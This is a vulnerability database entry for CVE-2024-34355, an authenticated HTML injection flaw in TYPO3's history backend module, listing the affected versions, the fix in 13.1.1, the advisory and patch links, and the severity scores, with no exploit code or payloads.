CVE-2024-34355
LOWTYPO3 13.0.0-13.1.0 - Authenticated HTML Injection in History Backend Module
Title source: llmDescription
TYPO3 is an enterprise content management system. Starting in version 13.0.0 and prior to version 13.1.1, the history backend module is vulnerable to HTML injection. Although Content-Security-Policy headers effectively prevent JavaScript execution, adversaries can still inject malicious HTML markup. Exploiting this vulnerability requires a valid backend user account. TYPO3 version 13.1.1 fixes the problem described.
References (3)
Core 3
Core References
Vendor Advisory x_refsource_confirm
https://github.com/TYPO3/typo3/security/advisories/GHSA-xjwx-78x7-q6jc
Patch x_refsource_misc
https://github.com/TYPO3/typo3/commit/56afa304ba8b5ad302e15df5def71bcc8d820375
Vendor Advisory x_refsource_misc
https://typo3.org/security/advisory/typo3-core-sa-2024-007
Scores
CVSS v3
3.5
EPSS
0.0059
EPSS Percentile
43.2%
Attack Vector
NETWORK
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N
CISA SSVC
Vulnrichment
Exploitation
none
Automatable
no
Technical Impact
partial
Details
CWE
CWE-79
CWE-116
Status
published
Products (2)
typo3/cms-core
13.0.0 - 13.1.1Packagist
typo3/typo3
13.0.0 - 13.1.1
Published
May 14, 2024
Tracked Since
Feb 18, 2026